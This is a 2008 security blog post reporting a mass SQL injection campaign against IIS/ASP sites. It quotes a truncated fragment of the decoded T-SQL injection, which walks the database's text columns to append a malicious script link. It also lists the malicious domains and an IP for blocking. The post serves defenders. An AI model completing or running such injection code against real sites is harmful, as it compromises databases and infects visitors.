Tuesday, November 24, 2020
  • Home

Mass SQL injections

April 26th, 2008 by Patrick S

Earlier this week I published a post regarding a vulnerability in several versions of Microsoft Windows
…Well the vulnerability is now being executed-there is another round of Mass SQL injections going on which has infected hundreds of thousands of websites running on the IIS platform.

Preforming a simple Google search for traces of the malicious script results in over 510,000 modified pages.

With more and more websites using a SQL back-end to make them faster and more dynamic, it also means that it’s crucial to verify what information get stored in or requested from those databases – especially if you allow users to upload content themselves which happens all the time in discussion forums, blogs, feedback forms etc. Unless that data is sanitized before it gets saved you can’t control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls.

Currently the malicious file that is being injected is 1.js however it must be noted that this could change at any stage. Visitors to this website are “treated” to 8 different exploits for many windows based applications including AIM, RealPlayer, and iTunes. DO NOTvisit sites that link to this site as you are very likely to get infected. Trendmicro named the malware toj_agent.KAQ it watches for passwords and passes them back to contoller’s ip.

In this case the injection code starts off like this (note, this is not the complete code):


Which when decoded becomes:

   DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor
   CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b
   where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
   or b…

What happens as a result? It finds all text fields in the database and adds a link to malicious javascript to each and every one of them which will make your website display them automatically. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as an article ID, product ID, et cetera) parameter and tried to use that to upload their SQL injection code.

So far three different domains have been used to host the malicious content — nmidahena.com, aspder.com and nihaorr1.com. There’s a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains are inaccessible but that could change. So if you’re a firewall administrator we recommend you to block access to them.

I would recommend that Administrators block access to hxxp:/www.nihaorr1.com and the IP it resolves to 219DOT153DOT46DOT28 at the edge or border of your network.

Info sourced from f-secure

Posted in MS News | 1 Comment »

This entry was posted on Saturday, April 26th, 2008 at 4:30 am and is filed under MS News. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.

One Response

  1. SQL Injection attacks continue, Is it Microsoft’s Fault? Says:

    […] also has a great a great blog article on the current attacks at on his blog at msblog.org that details what’s going on and that there are now 510,000 modified pages in Google as part […]